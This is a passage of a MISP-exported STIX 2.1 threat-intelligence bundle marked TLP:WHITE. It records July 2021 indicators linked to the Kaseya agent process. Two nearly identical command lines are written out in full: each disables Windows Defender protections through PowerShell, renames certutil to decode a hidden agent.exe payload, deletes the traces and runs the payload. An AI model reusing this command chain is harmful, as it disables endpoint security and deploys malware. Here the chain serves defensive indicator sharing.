"2021-07-05T08:19:46.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "\"%WINDIR%\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 6258 > nul & %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y %WINDIR%\\System32\\certutil.exe %WINDIR%\\cert.exe & echo %RANDOM% >> %WINDIR%\\cert.exe & %WINDIR%\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt %WINDIR%\\cert.exe & c:\\kworking\\agent.exe", "category": "Other", "uuid": "cbfcd350-0e50-4e7e-a839-f3869a4ae11e" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:19:02.000Z", "modified": "2021-07-05T08:19:02.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "\"%WINDIR%\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 5693 > nul & %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y %WINDIR%\\System32\\certutil.exe %WINDIR%\\cert.exe & echo %RANDOM% >> %WINDIR%\\cert.exe & %WINDIR%\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt %WINDIR%\\cert.exe & c:\\kworking\\agent.exe", "category": "Other", "uuid": "d27857cb-272f-434f-8236-5a65e4c12acf" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:18:04.000Z", "modified": "2021-07-05T08:18:04.000Z", "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "fullpath", "value": "%PROGRAMFILES%\\(x86)\\Kaseya\\\\AgentMon.exe", "category": "Other", "uuid": "a94932af-2266-4478-860f-a16e0162f761" } ], "x_misp_meta_category": "file", "x_misp_name": "file" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1b551a7c-1d52-497a-8eb7-ddc39717c2a1", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "target_ref": "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f1e68dce-2415-4c97-8dc5-8462985248dc", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "target_ref": "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3154082f-b1cd-4d18-8139-e5a25682aa21", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "target_ref": "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4d8d7fa4-3bea-4bf9-97e0-d585b262980a", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "target_ref": "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1a3e175a-43e5-4c38-bd6f-6c657acd3785", "created": "2021-07-05T08:15:25.000Z", "modified": "2021-07-05T08:15:25.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "target_ref": "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a37c72bd-2565-4cae-93f4-f56a5b57d4d7", "created": "2021-07-05T08:19:46.000Z", "modified": "2021-07-05T08:19:46.000Z", "relationship_type": "child-of", "source_ref": "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "target_ref": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--975070c8-f353-432c-9f2d-9c7383661ec0", "created": "2021-07-05T08:19:02.000Z", "modified": "2021-07-05T08:19:02.000Z", "relationship_type": "child-of", "source_ref": "x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "target_ref": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }